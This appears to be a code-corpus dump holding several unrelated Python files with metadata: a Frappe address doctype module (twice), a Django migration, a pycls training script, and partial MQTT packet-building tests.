'Enum441',
'Enum442',
'Enum443',
'Enum444',
'Enum445',
'Enum446',
'Enum447',
'Enum448',
'Enum449',
'Enum45',
'Enum450',
'Enum451',
'Enum452',
'Enum453',
'Enum454',
'Enum455',
'Enum456',
'Enum457',
'Enum458',
'Enum459',
'Enum46',
'Enum460',
'Enum461',
'Enum462',
'Enum463',
'Enum464',
'Enum465',
'Enum466',
'Enum467',
'Enum468',
'Enum469',
'Enum47',
'Enum470',
'Enum471',
'Enum472',
'Enum473',
'Enum474',
'Enum475',
'Enum48',
'Enum49',
'Enum50',
'Enum51',
'Enum52',
'Enum53',
'Enum54',
'Enum55',
'Enum56',
'Enum57',
'Enum58',
'Enum59',
'Enum60',
'Enum61',
'Enum62',
'Enum63',
'Enum64',
'Enum65',
'Enum66',
'Enum67',
'Enum68',
'Enum69',
'Enum70',
'Enum71',
'Enum72',
'Enum73',
'Enum74',
'Enum75',
'Enum76',
'Enum77',
'Enum78',
'Enum79',
'Enum80',
'Enum81',
'Enum82',
'Enum83',
'Enum84',
'Enum85',
'Enum86',
'Enum87',
'Enum88',
'Enum89',
'Enum90',
'Enum91',
'Enum92',
'Enum93',
'Enum94',
'Enum95',
'Enum96',
'Enum97',
'Enum98',
'Enum99',
'Get10ItemsItem',
'Get1ItemsItem',
'Get2ItemsItem',
'Get4ItemsItem',
'Get5ItemsItem',
'Get6ItemsItem',
'Get7ItemsItem',
'Get9ItemsItem',
'MicrosoftGraphAttendeeType',
'MicrosoftGraphBodyType',
'MicrosoftGraphCalendarColor',
'MicrosoftGraphCalendarRoleType',
'MicrosoftGraphDayOfWeek',
'MicrosoftGraphEventType',
'MicrosoftGraphFreeBusyStatus',
'MicrosoftGraphImportance',
'MicrosoftGraphLocationType',
'MicrosoftGraphLocationUniqueIdType',
'MicrosoftGraphOnlineMeetingProviderType',
'MicrosoftGraphPhoneType',
'MicrosoftGraphPhysicalAddressType',
'MicrosoftGraphRecurrencePatternType',
'MicrosoftGraphRecurrenceRangeType',
'MicrosoftGraphResponseType',
'MicrosoftGraphSensitivity',
'MicrosoftGraphWeekIndex',
]
| true | true |
1c304aaf93f5966aee6fde13a1ac69ba893a3c51 | 8,774 | py | Python | frappe/contacts/doctype/address/address.py | Havenir/gppert-frappe | d302388ad15b36754a48c5d047d7515dad257b89 | [
"MIT"
] | null | null | null | frappe/contacts/doctype/address/address.py | Havenir/gppert-frappe | d302388ad15b36754a48c5d047d7515dad257b89 | [
"MIT"
] | 5 | 2020-07-20T01:13:34.000Z | 2022-02-10T21:49:18.000Z | frappe/contacts/doctype/address/address.py | Havenir/gppert-frappe | d302388ad15b36754a48c5d047d7515dad257b89 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (c) 2015, Frappe Technologies and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe import throw, _
from frappe.utils import cstr
from frappe.model.document import Document
from jinja2 import TemplateSyntaxError
from frappe.utils.user import is_website_user
from frappe.model.naming import make_autoname
from frappe.core.doctype.dynamic_link.dynamic_link import deduplicate_dynamic_links
from six import iteritems, string_types
from past.builtins import cmp
from frappe.contacts.address_and_contact import set_link_title
import functools
class Address(Document):
    """Postal address, attached to other documents through Dynamic Links."""

    def __setup__(self):
        # Transient flag callers use to mark that this address has already
        # been linked during processing; not persisted.
        self.flags.linked = False

    def autoname(self):
        """Name the document "<title>-<type>", adding a serial on collision.

        Raises if no address_title is set and none can be derived from links.
        """
        if not self.address_title:
            if self.links:
                # Fall back to the first linked document's name as the title.
                self.address_title = self.links[0].link_name

        if self.address_title:
            self.name = (cstr(self.address_title).strip() + "-" + cstr(_(self.address_type)).strip())
            if frappe.db.exists("Address", self.name):
                # Name already taken: let the naming series append a number.
                self.name = make_autoname(cstr(self.address_title).strip() + "-" +
                    cstr(self.address_type).strip() + "-.#")
        else:
            throw(_("Address Title is mandatory."))

    def validate(self):
        self.link_address()
        self.validate_reference()
        set_link_title(self)
        deduplicate_dynamic_links(self)

    def validate_reference(self):
        if self.is_your_company_address:
            if not [row for row in self.links if row.link_doctype == "Company"]:
                frappe.throw(_("Company is mandatory, as it is your company address"))

            # A company address may only link to Company records; drop the rest.
            # (Plain loop instead of a side-effect list comprehension.)
            to_remove = [row for row in self.links if row.link_doctype != "Company"]
            for row in to_remove:
                self.remove(row)

    def link_address(self):
        """Copy links from the owner's Contact when this address has none.

        Returns True if links were copied, else False.
        """
        if not self.links and not self.is_your_company_address:
            contact_name = frappe.db.get_value("Contact", {"email_id": self.owner})
            if contact_name:
                contact = frappe.get_cached_doc('Contact', contact_name)
                for link in contact.links:
                    self.append('links', dict(link_doctype=link.link_doctype, link_name=link.link_name))
                return True

        return False

    def get_display(self):
        return get_address_display(self.as_dict())

    def has_link(self, doctype, name):
        """Return True if this address links to (doctype, name)."""
        for link in self.links:
            if link.link_doctype == doctype and link.link_name == name:
                return True

    def has_common_link(self, doc):
        """Return True if this address shares any Dynamic Link with *doc*."""
        reference_links = [(link.link_doctype, link.link_name) for link in doc.links]
        for link in self.links:
            if (link.link_doctype, link.link_name) in reference_links:
                return True

        return False
@frappe.whitelist()
def get_default_address(doctype, name, sort_key='is_primary_address'):
    """Return the name of the default Address linked to (doctype, name).

    sort_key must be 'is_primary_address' or 'is_shipping_address'; the
    linked address with the highest flag value wins. Returns None when
    nothing is linked or sort_key is invalid.
    """
    if sort_key not in ['is_shipping_address', 'is_primary_address']:
        # Whitelist the column name before interpolating it into the SQL.
        return None

    out = frappe.db.sql(""" SELECT
        addr.name, addr.%s
    FROM
        `tabAddress` addr, `tabDynamic Link` dl
    WHERE
        dl.parent = addr.name and dl.link_doctype = %s and
        dl.link_name = %s and ifnull(addr.disabled, 0) = 0
    """ % (sort_key, '%s', '%s'), (doctype, name))

    if out:
        # Highest flag wins; max() keeps the first row on ties, matching the
        # previous stable descending cmp-sort (a Python 2 relic via
        # past.builtins.cmp + functools.cmp_to_key).
        return max(out, key=lambda row: row[1])[0]

    return None
@frappe.whitelist()
def get_address_display(address_dict):
    """Render an address (name or dict of fields) via its Address Template."""
    if not address_dict:
        return None

    if not isinstance(address_dict, dict):
        # A document name was passed in; load the full record.
        fetched = frappe.db.get_value("Address", address_dict, "*", as_dict=True, cache=True)
        address_dict = fetched or {}

    template_name, template = get_address_templates(address_dict)

    try:
        rendered = frappe.render_template(template, address_dict)
    except TemplateSyntaxError:
        frappe.throw(_("There is an error in your Address Template {0}").format(template_name))
    else:
        return rendered
def get_territory_from_address(address):
    """Match the address' city, state or country (in that order) to a Territory."""
    if not address:
        return None

    if isinstance(address, string_types):
        address = frappe.get_cached_doc("Address", address)

    for fieldname in ("city", "state", "country"):
        candidate = address.get(fieldname)
        if not candidate:
            continue
        match = frappe.db.get_value("Territory", candidate)
        if match:
            return match

    return None
def get_list_context(context=None):
    """Portal list-view configuration for Address records."""
    list_context = {
        "title": _("Addresses"),
        "get_list": get_address_list,
        "row_template": "templates/includes/address_row.html",
        "no_breadcrumbs": True,
    }
    return list_context
def get_address_list(doctype, txt, filters, limit_start, limit_page_length=20, order_by=None):
    """Return Addresses for the portal list view.

    Website users are restricted to addresses linked (via Dynamic Link)
    to the parties their Contact record links to; permission checks are
    skipped for that pre-filtered set.
    """
    from frappe.www.list import get_list

    user = frappe.session.user
    ignore_permissions = False

    if is_website_user():
        if not filters:
            filters = []

        # Addresses linked to any party that the user's Contact links to.
        contact = frappe.db.sql("""
            select
                address.name
            from
                `tabDynamic Link` as link
            join
                `tabAddress` as address on link.parent = address.name
            where
                link.parenttype = 'Address' and
                link_name in(
                    select
                        link.link_name from `tabContact` as contact
                    join
                        `tabDynamic Link` as link on contact.name = link.parent
                    where
                        contact.user = %s)""", (user,))  # real 1-tuple; `(user)` was just a string
        add_name = [row[0] for row in contact]

        filters.append(("Address", "name", "in", add_name))
        ignore_permissions = True

    return get_list(doctype, txt, filters, limit_start, limit_page_length, ignore_permissions=ignore_permissions)
def has_website_permission(doc, ptype, user, verbose=False):
    """Grant access when a Contact or Lead of the session user relates to *doc*."""
    session_email = frappe.session.user

    contact_name = frappe.db.get_value("Contact", {"email_id": session_email})
    if contact_name:
        # Contact exists: permission hinges on a shared Dynamic Link.
        return frappe.get_doc('Contact', contact_name).has_common_link(doc)

    lead_name = frappe.db.get_value("Lead", {"email_id": session_email})
    return doc.has_link('Lead', lead_name) if lead_name else False
def get_address_templates(address):
    """Return (name, template) of the Address Template for the address' country.

    Falls back to the default Address Template; raises when neither exists.
    """
    result = frappe.db.get_value("Address Template",
        {"country": address.get("country")}, ["name", "template"])

    if not result:
        # No country-specific template; try the configured default.
        result = frappe.db.get_value("Address Template",
            {"is_default": 1}, ["name", "template"])

    if not result:
        frappe.throw(_("No default Address Template found. Please create a new one from Setup > Printing and Branding > Address Template."))

    # Flattened from nested if/else so every success path returns the
    # template (the previous nesting could fall through and return None).
    return result
@frappe.whitelist()
def get_shipping_address(company, address=None):
    """Return (name, rendered display) of the company's own shipping address."""
    filters = [
        ["Dynamic Link", "link_doctype", "=", "Company"],
        ["Dynamic Link", "link_name", "=", company],
        ["Address", "is_your_company_address", "=", 1],
    ]

    if address and frappe.db.get_value('Dynamic Link',
            {'parent': address, 'link_name': company}):
        # A specific address was requested and it does belong to the company.
        filters.append(["Address", "name", "=", address])

    matches = frappe.get_all("Address", filters=filters, fields=["*"]) or {}
    if not matches:
        return None

    address_as_dict = matches[0]
    name, address_template = get_address_templates(address_as_dict)
    return address_as_dict.get("name"), frappe.render_template(address_template, address_as_dict)
def get_company_address(company):
    """Return a dict with the company's default address name and its display."""
    out = frappe._dict()
    out.company_address = get_default_address('Company', company)
    out.company_address_display = get_address_display(out.company_address)
    return out
def address_query(doctype, txt, searchfield, start, page_len, filters):
    """Link-field query: Addresses linked to filters' (link_doctype, link_name).

    Any remaining filter key/values become extra equality conditions; the
    values are escaped before interpolation into the statement.
    """
    from frappe.desk.reportview import get_match_cond

    link_doctype = filters.pop('link_doctype')
    link_name = filters.pop('link_name')

    condition = ""
    for fieldname, value in iteritems(filters):
        # Escape the value: interpolating it verbatim (as before) produced
        # broken SQL for strings and allowed injection via filter values.
        condition += " and {field}={value}".format(
            field=fieldname,
            value=frappe.db.escape(value)
        )

    meta = frappe.get_meta("Address")
    searchfields = meta.get_search_fields()
    if searchfield:
        searchfields.append(searchfield)

    # One LIKE clause per search field, OR-ed together.
    search_condition = ' or '.join(
        '`tabAddress`.`{field}` like %(txt)s'.format(field=field)
        for field in searchfields
    )

    return frappe.db.sql("""select
            `tabAddress`.name, `tabAddress`.city, `tabAddress`.country
        from
            `tabAddress`, `tabDynamic Link`
        where
            `tabDynamic Link`.parent = `tabAddress`.name and
            `tabDynamic Link`.parenttype = 'Address' and
            `tabDynamic Link`.link_doctype = %(link_doctype)s and
            `tabDynamic Link`.link_name = %(link_name)s and
            ifnull(`tabAddress`.disabled, 0) = 0 and
            ({search_condition})
            {mcond} {condition}
        order by
            if(locate(%(_txt)s, `tabAddress`.name), locate(%(_txt)s, `tabAddress`.name), 99999),
            `tabAddress`.idx desc, `tabAddress`.name
        limit %(start)s, %(page_len)s """.format(
            mcond=get_match_cond(doctype),
            search_condition=search_condition,
            condition=condition or ""),
        {
            'txt': "%%%s%%" % frappe.db.escape(txt),
            '_txt': txt.replace("%", ""),
            'start': start,
            'page_len': page_len,
            'link_name': link_name,
            'link_doctype': link_doctype
        })
| 31.224199 | 134 | 0.713928 |
from __future__ import unicode_literals
import frappe
from frappe import throw, _
from frappe.utils import cstr
from frappe.model.document import Document
from jinja2 import TemplateSyntaxError
from frappe.utils.user import is_website_user
from frappe.model.naming import make_autoname
from frappe.core.doctype.dynamic_link.dynamic_link import deduplicate_dynamic_links
from six import iteritems, string_types
from past.builtins import cmp
from frappe.contacts.address_and_contact import set_link_title
import functools
class Address(Document):
    """Postal address, attached to other documents through Dynamic Links."""

    def __setup__(self):
        # Transient flag callers use to mark that this address has already
        # been linked during processing; not persisted.
        self.flags.linked = False

    def autoname(self):
        """Name the document "<title>-<type>", adding a serial on collision.

        Raises if no address_title is set and none can be derived from links.
        """
        if not self.address_title:
            if self.links:
                # Fall back to the first linked document's name as the title.
                self.address_title = self.links[0].link_name

        if self.address_title:
            self.name = (cstr(self.address_title).strip() + "-" + cstr(_(self.address_type)).strip())
            if frappe.db.exists("Address", self.name):
                # Name already taken: let the naming series append a number.
                self.name = make_autoname(cstr(self.address_title).strip() + "-" +
                    cstr(self.address_type).strip() + "-.#")
        else:
            throw(_("Address Title is mandatory."))

    def validate(self):
        self.link_address()
        self.validate_reference()
        set_link_title(self)
        deduplicate_dynamic_links(self)

    def link_address(self):
        """Copy links from the owner's Contact when this address has none.

        Returns True if links were copied, else False.
        """
        if not self.links and not self.is_your_company_address:
            contact_name = frappe.db.get_value("Contact", {"email_id": self.owner})
            if contact_name:
                contact = frappe.get_cached_doc('Contact', contact_name)
                for link in contact.links:
                    self.append('links', dict(link_doctype=link.link_doctype, link_name=link.link_name))
                return True

        return False

    def validate_reference(self):
        if self.is_your_company_address:
            if not [row for row in self.links if row.link_doctype == "Company"]:
                frappe.throw(_("Company is mandatory, as it is your company address"))

            # A company address may only link to Company records; drop the rest.
            # (Plain loop instead of a side-effect list comprehension.)
            to_remove = [row for row in self.links if row.link_doctype != "Company"]
            for row in to_remove:
                self.remove(row)

    def get_display(self):
        return get_address_display(self.as_dict())

    def has_link(self, doctype, name):
        """Return True if this address links to (doctype, name)."""
        for link in self.links:
            if link.link_doctype == doctype and link.link_name == name:
                return True

    def has_common_link(self, doc):
        """Return True if this address shares any Dynamic Link with *doc*."""
        reference_links = [(link.link_doctype, link.link_name) for link in doc.links]
        for link in self.links:
            if (link.link_doctype, link.link_name) in reference_links:
                return True

        return False
@frappe.whitelist()
def get_default_address(doctype, name, sort_key='is_primary_address'):
    """Return the name of the default Address linked to (doctype, name).

    sort_key must be 'is_primary_address' or 'is_shipping_address'; the
    linked address with the highest flag value wins. Returns None when
    nothing is linked or sort_key is invalid.
    """
    if sort_key not in ['is_shipping_address', 'is_primary_address']:
        # Whitelist the column name before interpolating it into the SQL.
        return None

    out = frappe.db.sql(""" SELECT
        addr.name, addr.%s
    FROM
        `tabAddress` addr, `tabDynamic Link` dl
    WHERE
        dl.parent = addr.name and dl.link_doctype = %s and
        dl.link_name = %s and ifnull(addr.disabled, 0) = 0
    """ % (sort_key, '%s', '%s'), (doctype, name))

    if out:
        # Highest flag wins; max() keeps the first row on ties, matching the
        # previous stable descending cmp-sort (a Python 2 relic via
        # past.builtins.cmp + functools.cmp_to_key).
        return max(out, key=lambda row: row[1])[0]

    return None
@frappe.whitelist()
def get_address_display(address_dict):
    """Render an address (name or dict of fields) via its Address Template."""
    if not address_dict:
        return None

    if not isinstance(address_dict, dict):
        # A document name was passed in; load the full record.
        fetched = frappe.db.get_value("Address", address_dict, "*", as_dict=True, cache=True)
        address_dict = fetched or {}

    template_name, template = get_address_templates(address_dict)

    try:
        rendered = frappe.render_template(template, address_dict)
    except TemplateSyntaxError:
        frappe.throw(_("There is an error in your Address Template {0}").format(template_name))
    else:
        return rendered
def get_territory_from_address(address):
    """Match the address' city, state or country (in that order) to a Territory."""
    if not address:
        return None

    if isinstance(address, string_types):
        address = frappe.get_cached_doc("Address", address)

    for fieldname in ("city", "state", "country"):
        candidate = address.get(fieldname)
        if not candidate:
            continue
        match = frappe.db.get_value("Territory", candidate)
        if match:
            return match

    return None
def get_list_context(context=None):
    """Portal list-view configuration for Address records."""
    list_context = {
        "title": _("Addresses"),
        "get_list": get_address_list,
        "row_template": "templates/includes/address_row.html",
        "no_breadcrumbs": True,
    }
    return list_context
def get_address_list(doctype, txt, filters, limit_start, limit_page_length=20, order_by=None):
    """Return Addresses for the portal list view.

    Website users are restricted to addresses linked (via Dynamic Link)
    to the parties their Contact record links to; permission checks are
    skipped for that pre-filtered set.
    """
    from frappe.www.list import get_list

    user = frappe.session.user
    ignore_permissions = False

    if is_website_user():
        if not filters:
            filters = []

        # Addresses linked to any party that the user's Contact links to.
        contact = frappe.db.sql("""
            select
                address.name
            from
                `tabDynamic Link` as link
            join
                `tabAddress` as address on link.parent = address.name
            where
                link.parenttype = 'Address' and
                link_name in(
                    select
                        link.link_name from `tabContact` as contact
                    join
                        `tabDynamic Link` as link on contact.name = link.parent
                    where
                        contact.user = %s)""", (user,))  # real 1-tuple; `(user)` was just a string
        add_name = [row[0] for row in contact]

        filters.append(("Address", "name", "in", add_name))
        ignore_permissions = True

    return get_list(doctype, txt, filters, limit_start, limit_page_length, ignore_permissions=ignore_permissions)
def has_website_permission(doc, ptype, user, verbose=False):
    """Grant access when a Contact or Lead of the session user relates to *doc*."""
    session_email = frappe.session.user

    contact_name = frappe.db.get_value("Contact", {"email_id": session_email})
    if contact_name:
        # Contact exists: permission hinges on a shared Dynamic Link.
        return frappe.get_doc('Contact', contact_name).has_common_link(doc)

    lead_name = frappe.db.get_value("Lead", {"email_id": session_email})
    return doc.has_link('Lead', lead_name) if lead_name else False
def get_address_templates(address):
    """Return (name, template) of the Address Template for the address' country.

    Falls back to the default Address Template; raises when neither exists.
    """
    result = frappe.db.get_value("Address Template",
        {"country": address.get("country")}, ["name", "template"])

    if not result:
        # No country-specific template; try the configured default.
        result = frappe.db.get_value("Address Template",
            {"is_default": 1}, ["name", "template"])

    if not result:
        frappe.throw(_("No default Address Template found. Please create a new one from Setup > Printing and Branding > Address Template."))

    # Flattened from nested if/else so every success path returns the
    # template (the previous nesting could fall through and return None).
    return result
@frappe.whitelist()
def get_shipping_address(company, address=None):
    """Return (name, rendered display) of the company's own shipping address."""
    filters = [
        ["Dynamic Link", "link_doctype", "=", "Company"],
        ["Dynamic Link", "link_name", "=", company],
        ["Address", "is_your_company_address", "=", 1],
    ]

    if address and frappe.db.get_value('Dynamic Link',
            {'parent': address, 'link_name': company}):
        # A specific address was requested and it does belong to the company.
        filters.append(["Address", "name", "=", address])

    matches = frappe.get_all("Address", filters=filters, fields=["*"]) or {}
    if not matches:
        return None

    address_as_dict = matches[0]
    name, address_template = get_address_templates(address_as_dict)
    return address_as_dict.get("name"), frappe.render_template(address_template, address_as_dict)
def get_company_address(company):
    """Return a dict with the company's default address name and its display."""
    out = frappe._dict()
    out.company_address = get_default_address('Company', company)
    out.company_address_display = get_address_display(out.company_address)
    return out
def address_query(doctype, txt, searchfield, start, page_len, filters):
    """Link-field query: Addresses linked to filters' (link_doctype, link_name).

    Any remaining filter key/values become extra equality conditions; the
    values are escaped before interpolation into the statement.
    """
    from frappe.desk.reportview import get_match_cond

    link_doctype = filters.pop('link_doctype')
    link_name = filters.pop('link_name')

    condition = ""
    for fieldname, value in iteritems(filters):
        # Escape the value: interpolating it verbatim (as before) produced
        # broken SQL for strings and allowed injection via filter values.
        condition += " and {field}={value}".format(
            field=fieldname,
            value=frappe.db.escape(value)
        )

    meta = frappe.get_meta("Address")
    searchfields = meta.get_search_fields()
    if searchfield:
        searchfields.append(searchfield)

    # One LIKE clause per search field, OR-ed together.
    search_condition = ' or '.join(
        '`tabAddress`.`{field}` like %(txt)s'.format(field=field)
        for field in searchfields
    )

    return frappe.db.sql("""select
            `tabAddress`.name, `tabAddress`.city, `tabAddress`.country
        from
            `tabAddress`, `tabDynamic Link`
        where
            `tabDynamic Link`.parent = `tabAddress`.name and
            `tabDynamic Link`.parenttype = 'Address' and
            `tabDynamic Link`.link_doctype = %(link_doctype)s and
            `tabDynamic Link`.link_name = %(link_name)s and
            ifnull(`tabAddress`.disabled, 0) = 0 and
            ({search_condition})
            {mcond} {condition}
        order by
            if(locate(%(_txt)s, `tabAddress`.name), locate(%(_txt)s, `tabAddress`.name), 99999),
            `tabAddress`.idx desc, `tabAddress`.name
        limit %(start)s, %(page_len)s """.format(
            mcond=get_match_cond(doctype),
            search_condition=search_condition,
            condition=condition or ""),
        {
            'txt': "%%%s%%" % frappe.db.escape(txt),
            '_txt': txt.replace("%", ""),
            'start': start,
            'page_len': page_len,
            'link_name': link_name,
            'link_doctype': link_doctype
        })
| true | true |
1c304b135783e9e7dc654907e0b2aebe5f5bcd11 | 863 | py | Python | post/migrations/0001_initial.py | Yash1256/Django-Intern | c1d42ff344324b56d462ae8c3d5b6682a2b255b6 | [
"MIT"
] | 1 | 2020-10-03T21:38:39.000Z | 2020-10-03T21:38:39.000Z | post/migrations/0001_initial.py | Yash1256/Django-Intern | c1d42ff344324b56d462ae8c3d5b6682a2b255b6 | [
"MIT"
] | 3 | 2021-04-08T19:53:55.000Z | 2021-06-10T18:45:15.000Z | post/migrations/0001_initial.py | Yash1256/Django-Intern | c1d42ff344324b56d462ae8c3d5b6682a2b255b6 | [
"MIT"
] | 1 | 2021-01-11T10:28:25.000Z | 2021-01-11T10:28:25.000Z | # Generated by Django 3.0.4 on 2020-03-06 22:37
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration: creates the ``Post`` model backed by the ``posts`` table."""

    initial = True  # first migration for this app; depends on no prior state

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Post',
            fields=[
                # Auto-incrementing surrogate primary key.
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # NOTE(review): plain integer, not a ForeignKey to the user model — confirm intentional.
                ('author_id', models.IntegerField()),
                ('title', models.CharField(max_length=255)),
                ('description', models.CharField(max_length=500)),
                ('content', models.TextField()),
                ('date', models.DateField()),
            ],
            options={
                'verbose_name': 'Post',
                'verbose_name_plural': 'Posts',
                'db_table': 'posts',  # explicit table name instead of Django's default
            },
        ),
    ]
| 27.83871 | 114 | 0.515643 |
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('author_id', models.IntegerField()),
('title', models.CharField(max_length=255)),
('description', models.CharField(max_length=500)),
('content', models.TextField()),
('date', models.DateField()),
],
options={
'verbose_name': 'Post',
'verbose_name_plural': 'Posts',
'db_table': 'posts',
},
),
]
| true | true |
1c304b1d8299295e1ead2d47ec6dd4e57fee0493 | 920 | py | Python | tools/train_net.py | PeterouZh/pycls | 8058334801c140fa8c6f0dc29276c02f71ee054d | [
"MIT"
] | null | null | null | tools/train_net.py | PeterouZh/pycls | 8058334801c140fa8c6f0dc29276c02f71ee054d | [
"MIT"
] | null | null | null | tools/train_net.py | PeterouZh/pycls | 8058334801c140fa8c6f0dc29276c02f71ee054d | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""Train a classification model."""
import importlib
import pycls.core.config as config
import pycls.core.distributed as dist
import pycls.core.trainer as trainer
from pycls.core.config import cfg
from template_lib.v2.config import global_cfg
from template_lib.d2.utils import D2Utils
def main():
    """Load and freeze the config, resolve the trainer module named in the
    config (default ``pycls.core.trainer``), and launch distributed training
    across ``cfg.NUM_GPUS`` processes."""
    config.load_cfg_fom_args("Train a classification model.")
    config.assert_and_infer_cfg()
    D2Utils.cfg_merge_from_easydict(cfg, global_cfg)
    cfg.freeze()
    module_path = cfg.get('trainer_module', 'pycls.core.trainer')
    trainer_mod = importlib.import_module(module_path)
    dist.multi_proc_run(num_proc=cfg.NUM_GPUS, fun=trainer_mod.train_model)
if __name__ == "__main__":
main()
| 27.058824 | 78 | 0.767391 |
import importlib
import pycls.core.config as config
import pycls.core.distributed as dist
import pycls.core.trainer as trainer
from pycls.core.config import cfg
from template_lib.v2.config import global_cfg
from template_lib.d2.utils import D2Utils
def main():
config.load_cfg_fom_args("Train a classification model.")
config.assert_and_infer_cfg()
D2Utils.cfg_merge_from_easydict(cfg, global_cfg)
cfg.freeze()
trainer_module = cfg.get('trainer_module', 'pycls.core.trainer')
trainer_module = importlib.import_module(trainer_module)
dist.multi_proc_run(num_proc=cfg.NUM_GPUS, fun=trainer_module.train_model)
if __name__ == "__main__":
main()
| true | true |
1c304b23fc86014316f65986beeb37440af6a5df | 9,744 | py | Python | tests/test_building.py | jlitzingerdev/mqttpacket | d6fbb84ef24c5c5bc9798692206e074a2dbf3af6 | [
"MIT"
] | null | null | null | tests/test_building.py | jlitzingerdev/mqttpacket | d6fbb84ef24c5c5bc9798692206e074a2dbf3af6 | [
"MIT"
] | 1 | 2021-06-01T22:38:18.000Z | 2021-06-01T22:38:18.000Z | tests/test_building.py | jlitzingerdev/mqttpacket | d6fbb84ef24c5c5bc9798692206e074a2dbf3af6 | [
"MIT"
] | 1 | 2020-03-15T03:57:21.000Z | 2020-03-15T03:57:21.000Z | # -*- coding: utf-8 -*-
"""
Copyright 2018 Jason Litzinger
See LICENSE for details.
"""
import binascii
import json
import six
import pytest
import mqttpacket.v311 as mqttpacket
def test_connect_basic():
    """A CONNECT packet carrying only a client id matches the reference bytes."""
    packet = mqttpacket.connect(u'test')
    assert isinstance(packet, bytes)
    assert len(packet) == 18
    assert packet == binascii.unhexlify(
        b'101000044d5154540402003c000474657374'
    )
    assert six.indexbytes(packet, 0) == 16         # CONNECT fixed header
    assert six.indexbytes(packet, 9) == 0x02       # clean-session flag only
    assert packet[14:].decode('utf-8') == u'test'  # client id payload
def test_will_requirements():
    """will_topic and will_message are only valid when given together."""
    for kwargs in ({'will_topic': u'foo'}, {'will_message': u'my message'}):
        with pytest.raises(ValueError):
            mqttpacket.ConnectSpec(**kwargs)
def test_valid_will():
    """A complete will topic/message spec sets the flags and builds the payload."""
    spec = mqttpacket.ConnectSpec(
        will_topic=u'my_will_topic',
        will_message=u'my_will_message',
        will_qos=1,
    )
    assert spec.will_topic == u'my_will_topic'
    assert spec.will_message == u'my_will_message'
    assert spec.flags() == 0x0e      # will flag + QoS 1 + clean session
    assert len(spec.payload()) == 32

    spec = mqttpacket.ConnectSpec(
        will_topic=u'wt2',
        will_message=u'wm2',
        will_qos=2,
    )
    assert (spec.will_topic, spec.will_message) == (u'wt2', u'wm2')
    assert spec.flags() == 0x16      # will flag + QoS 2 + clean session
def test_default_spec():
    """With no options a spec has an empty payload and only clean-session set."""
    spec = mqttpacket.ConnectSpec()
    assert spec.flags() == 0x02
    assert not spec.payload()
def test_will_must_be_unicode():
    """Byte strings are rejected for either will field."""
    for topic, message in ((b'foo', u'bar'), (u'biz', b'baz')):
        with pytest.raises(TypeError):
            mqttpacket.ConnectSpec(will_topic=topic, will_message=message)
def test_will_qos_values():
    """Will QoS accepts 1 and 2 but rejects values above 2."""
    with pytest.raises(ValueError):
        mqttpacket.ConnectSpec(
            will_topic=u'biz',
            will_message=u'baz',
            will_qos=3,
        )
    # QoS 1 and 2 must construct without raising.
    for qos in (1, 2):
        mqttpacket.ConnectSpec(
            will_topic=u'my_will_topic',
            will_message=u'my_will_message',
            will_qos=qos,
        )
def test_connect_with_spec():
    """CONNECT honours an attached will spec in its flags and length."""
    spec = mqttpacket.ConnectSpec(
        will_topic=u'my_will_topic',
        will_message=u'my_will_message',
        will_qos=1,
    )
    packet = mqttpacket.connect(u'test', connect_spec=spec)
    assert isinstance(packet, bytes)
    assert len(packet) == 50
    assert six.indexbytes(packet, 0) == 16    # CONNECT packet type
    assert six.indexbytes(packet, 9) == 0x0e  # will flags + QoS 1
    assert packet[14:18].decode('utf-8') == u'test'
def test_build_subscription_multiple():
    """Two topic filters encode back-to-back (MQTT specification example)."""
    packet = mqttpacket.subscribe(10, [
        mqttpacket.SubscriptionSpec(u'a/b', 0x01),
        mqttpacket.SubscriptionSpec(u'c/d', 0x02),
    ])
    assert isinstance(packet, bytes)
    assert (six.indexbytes(packet, 0), six.indexbytes(packet, 1)) == (0x82, 14)
    # Packet id, big-endian.
    assert six.indexbytes(packet, 2) << 8 | six.indexbytes(packet, 3) == 10
    # First filter: length prefix, topic, QoS byte.
    assert six.indexbytes(packet, 4) << 8 | six.indexbytes(packet, 5) == 3
    assert packet[6:9].decode('utf-8') == u'a/b'
    assert six.indexbytes(packet, 9) == 0x01
    # Second filter.
    assert six.indexbytes(packet, 10) << 8 | six.indexbytes(packet, 11) == 3
    assert packet[12:15].decode('utf-8') == u'c/d'
    assert six.indexbytes(packet, 15) == 0x02
def test_build_subscription_single():
    """A single topic filter is encoded with its length prefix and QoS byte."""
    packet = mqttpacket.subscribe(
        10, [mqttpacket.SubscriptionSpec(u'test/1', 0x00)])
    assert isinstance(packet, bytes)
    assert (six.indexbytes(packet, 0), six.indexbytes(packet, 1)) == (0x82, 11)
    assert six.indexbytes(packet, 2) << 8 | six.indexbytes(packet, 3) == 10
    assert six.indexbytes(packet, 4) << 8 | six.indexbytes(packet, 5) == 6
    assert packet[6:12].decode('utf-8') == u'test/1'
    assert six.indexbytes(packet, 12) == 0x00
def test_subscription_spec_multibyte():
    """Topic length counts UTF-8 bytes, not characters."""
    spec = mqttpacket.SubscriptionSpec(u'super€', 0)
    # 2 length bytes + 8 encoded topic bytes + 1 QoS byte.
    assert spec.remaining_len() == 11
    assert spec.to_bytes() == b'\x00\x08\x73\x75\x70\x65\x72\xe2\x82\xac\x00'
def test_encode_single_byte_length():
    """Remaining lengths up to 127 fit in a single byte."""
    assert mqttpacket.encode_remainining_length(0) == b'\x00'
    assert mqttpacket.encode_remainining_length(127) == b'\x7f'
def test_encode_two_byte_length():
    """Remaining lengths 128..16383 use two bytes."""
    assert mqttpacket.encode_remainining_length(128) == b'\x80\x01'
    assert mqttpacket.encode_remainining_length(16383) == b'\xff\x7f'
def test_encode_three_byte_length():
    """Remaining lengths 16384..2097151 use three bytes."""
    assert mqttpacket.encode_remainining_length(16384) == b'\x80\x80\x01'
    assert mqttpacket.encode_remainining_length(2097151) == b'\xff\xff\x7f'
def test_encode_four_byte_length():
